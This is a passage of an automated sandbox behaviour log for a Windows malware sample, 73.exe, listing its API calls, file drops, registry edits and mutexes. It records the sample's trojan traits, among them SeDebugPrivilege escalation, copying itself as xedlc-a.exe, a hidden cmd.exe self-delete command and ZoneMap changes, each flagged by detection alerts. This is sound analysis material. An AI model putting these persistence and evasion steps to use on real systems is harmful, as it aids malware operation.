- mode: setval
- sequenceNumber: 99
- value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common AppData" = C:\Documents and Settings\All Users\Application Data
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 47684
- sequenceNumber: 100
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: ntdll.dll
- apiname: NtAdjustPrivilegesToken
- address: 0x77ddf01a
- params:
- param (id:1): SeDebugPrivilege
- param (id:2): Enabled
- apicall:
- timestamp: 47689
- sequenceNumber: 101
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: advapi32.dll
- apiname: GetTokenInformation
- address: 0x0041e684
- params:
- param (id:1): 0x1b4
- param (id:2): 0x19
- apicall:
- timestamp: 47689
- sequenceNumber: 102
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 47699
- sequenceNumber: 103
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 47715
- sequenceNumber: 104
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 47731
- sequenceNumber: 105
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 47746
- sequenceNumber: 106
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- file:
- timestamp: 47763
- mode: failed
- sequenceNumber: 107
- value: C:\Documents and Settings\admin\Application Data\73.exe
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x60
- PE:
- InspectionType: Ext
- file:
- timestamp: 47827
- type: dropped_executable
- mode: created
- sequenceNumber: 108
- value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883609148
- ntstatus: 0x0
- CreateOptions: 0x64
- PE:
- InspectionType: Ext
- malicious-alert:
- classtype: Malicious-Directory
- weight: 0
- ruleid: 2213 : Executable file created in suspicious location ; Process creating executable file in suspicious location
- msg: Process creating executable file in suspicious location
- display-msg: Executable file created in suspicious location
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10048 : Generic Trojan Behavior ; Generic Trojan Behavior
- msg: Generic Trojan Behavior
- display-msg: Generic Trojan Behavior
- file:
- timestamp: 47834
- mode: date_change
- sequenceNumber: 109
- value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- filesize: 364544
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- creationTime: 12/4/2015 9:43:04 PM
- lastWriteTime: 12/4/2015 9:43:04 PM
- changeTime: 12/4/2015 9:43:04 PM
- newCreationTime: N/A
- newLastWriteTime: 12/4/2015 9:43:00 PM
- newChangeTime: 12/4/2015 9:43:01 PM
- ads:
- fid (ads:): 1407374883609148
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47851
- type: dropped_executable
- mode: close
- sequenceNumber: 110
- value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883609148
- ntstatus: 0x0
- CreateOptions: 0x0
- PE:
- InspectionType: Deep
- Dll: No
- Machine: 0x014c
- TimeDateStamp: 0x4140dee4
- Characteristics:
- value: 0x010f
- names:
- name: Relocation info stripped
- name: Executable
- name: Line nunbers stripped
- name: Symbols stripped
- name: 32
- Magic: 0x010b
- Subsystem: Windows CUI
- DllCharacteristics:
- value: 0x0000
- names:
- file:
- timestamp: 47861
- mode: failed
- sequenceNumber: 111
- value: C:\Documents
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 47865
- mode: failed
- sequenceNumber: 112
- value: C:\Documents.exe
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 47870
- mode: failed
- sequenceNumber: 113
- value: C:\Documents and
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 47875
- mode: failed
- sequenceNumber: 114
- value: C:\Documents and.exe
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 47881
- mode: failed
- sequenceNumber: 115
- value: C:\Documents and Settings\admin\Application
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 47885
- mode: failed
- sequenceNumber: 116
- value: C:\Documents and Settings\admin\Application.exe
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- process:
- timestamp: 48070
- mode: started
- sequenceNumber: 117
- value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- pid: 800
- ppid: 364
- parentname: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- cmdline: "C:\Documents and Settings\admin\Application Data\xedlc-a.exe"
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- ads:
- fid (ads:): 1407374883609148
- malicious-alert:
- classtype: Process-cloned
- weight: 0
- ruleid: 8032 : Process clones and starts itself ; Process clones and starts itself
- msg: Process clones and starts itself
- display-msg: Process clones and starts itself
- apicall:
- timestamp: 48076
- sequenceNumber: 118
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: Shell32.dll
- apiname: ShellExecuteW
- address: 0x0041f5dd
- params:
- param (id:1): 0x0
- param (id:2): NULL
- param (id:3): C:\WINDOWS\system32\cmd.exe
- param (id:4): /c DEL C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe
- param (id:5): NULL
- param (id:6): 0
- malicious-alert:
- classtype: Generic-Anomalous-Activity
- weight: 0
- ruleid: 8006 : Hidden ShellExecute call made ; Hidden ShellExecute call made
- msg: Hidden ShellExecute call made
- display-msg: Hidden ShellExecute call made
- file:
- timestamp: 48083
- mode: failed
- sequenceNumber: 119
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\netapi32.dll
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 48109
- mode: failed
- sequenceNumber: 120
- value: C:\Documents and Settings\admin\Application Data\LPK.DLL
- processinfo:
- tainted: true
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 48116
- mode: failed
- sequenceNumber: 121
- value: C:\Documents and Settings\admin\Application Data\USP10.dll
- processinfo:
- tainted: true
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 48121
- mode: failed
- sequenceNumber: 122
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\SETUPAPI.dll
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 123
- timestamp: 48129
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 124
- timestamp: 48138
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 48147
- mode: failed
- sequenceNumber: 125
- value: C:\WINDOWS\aRu2Yo48qPE
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x60
- file:
- timestamp: 48151
- mode: failed
- sequenceNumber: 126
- value: C:\WINDOWS\Fonts\FQ2SznG21IEC5G4
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 48157
- mode: failed
- sequenceNumber: 127
- value: C:\Documents and Settings\admin\Application Data\FQ2SznG21IEC5G4
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 48162
- mode: failed
- sequenceNumber: 128
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\FQ2SznG21IEC5G4
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 48166
- mode: failed
- sequenceNumber: 129
- value: C:\WINDOWS\system32\FQ2SznG21IEC5G4
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 48171
- mode: failed
- sequenceNumber: 130
- value: C:\WINDOWS\system\FQ2SznG21IEC5G4
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 48175
- mode: failed
- sequenceNumber: 131
- value: C:\WINDOWS\FQ2SznG21IEC5G4
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 48180
- mode: failed
- sequenceNumber: 132
- value: C:\WINDOWS\system32\wbem\FQ2SznG21IEC5G4
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 48184
- mode: failed
- sequenceNumber: 133
- value: C:\Program Files\QuickTime\QTSystem\FQ2SznG21IEC5G4
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 48190
- mode: failed
- sequenceNumber: 134
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\FQ2SznG21IEC5G4
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 48195
- mode: failed
- sequenceNumber: 135
- value: C:\Program Files\Debugging Tools for Windows (x86)\FQ2SznG21IEC5G4
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 48200
- mode: failed
- sequenceNumber: 136
- value: C:\Documents and Settings\admin\Application Data\cfgmgr32.dll
- processinfo:
- tainted: true
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 48205
- mode: failed
- sequenceNumber: 137
- value: C:\Documents and Settings\admin\Application Data\setupapi.dll
- processinfo:
- tainted: true
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 48209
- sequenceNumber: 138
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x77927324
- params:
- param (id:1): 0x12f80c
- param (id:2): 260
- apicall:
- timestamp: 48213
- sequenceNumber: 139
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameExW
- address: 0x77927048
- params:
- param (id:1): 0
- param (id:2): 0x12f840
- param (id:3): 0x12f83c
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 140
- timestamp: 48218
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 48222
- sequenceNumber: 141
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameExW
- address: 0x779270ab
- params:
- param (id:1): 3
- param (id:2): 0x12f840
- param (id:3): 0x12f83c
- regkey:
- timestamp: 48227
- mode: setval
- sequenceNumber: 142
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e319f02e-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 48234
- mode: failed
- sequenceNumber: 143
- value: C:\WINDOWS\Fonts\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 48239
- mode: failed
- sequenceNumber: 144
- value: C:\Documents and Settings\admin\Application Data\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 48244
- mode: failed
- sequenceNumber: 145
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\R38QI00a0m0\D77273j5H4b
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 48248
- mode: failed
- sequenceNumber: 146
- value: C:\WINDOWS\system32\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 48253
- mode: failed
- sequenceNumber: 147
- value: C:\WINDOWS\system\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 48257
- mode: failed
- sequenceNumber: 148
- value: C:\WINDOWS\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 48263
- mode: failed
- sequenceNumber: 149
- value: C:\WINDOWS\system32\wbem\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- apicall:
- timestamp: 48300
- sequenceNumber: 150
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: EnumWindows
- address: 0x003d0eba
- params:
- param (id:1): 0x3d0e20
- param (id:2): 0x12f5f0
- apicall:
- timestamp: 48305
- sequenceNumber: 151
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x003d11cc
- params:
- param (id:1): 1100
- file:
- timestamp: 48315
- mode: failed
- sequenceNumber: 152
- value: C:\Program Files\QuickTime\QTSystem\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 48321
- mode: failed
- sequenceNumber: 153
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 48326
- mode: failed
- sequenceNumber: 154
- value: C:\Program Files\Debugging Tools for Windows (x86)\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- regkey:
- timestamp: 48320
- mode: setval
- sequenceNumber: 155
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e319f02c-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48388
- mode: added
- sequenceNumber: 156
- value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48391
- mode: setval
- sequenceNumber: 157
- value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Documents" = C:\Documents and Settings\All Users\Documents
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 48398
- sequenceNumber: 158
- value: \BaseNamedObjects\ZonesCounterMutex
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 48411
- sequenceNumber: 159
- value: \BaseNamedObjects\ZoneAttributeCacheCounterMutex
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 48414
- sequenceNumber: 160
- value: \BaseNamedObjects\ZonesCacheCounterMutex
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48417
- mode: setval
- sequenceNumber: 161
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48421
- mode: setval
- sequenceNumber: 162
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48425
- mode: setval
- sequenceNumber: 163
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48429
- mode: setval
- sequenceNumber: 164
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 48434
- sequenceNumber: 165
- value: \BaseNamedObjects\ZoneAttributeCacheCounterMutex
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 48437
- sequenceNumber: 166
- value: \BaseNamedObjects\ZonesLockedCacheCounterMutex
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48440
- mode: setval
- sequenceNumber: 167
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48445
- mode: setval
- sequenceNumber: 168
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48450
- mode: setval
- sequenceNumber: 169
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48455
- mode: setval
- sequenceNumber: 170
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48459
- mode: added
- sequenceNumber: 171
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
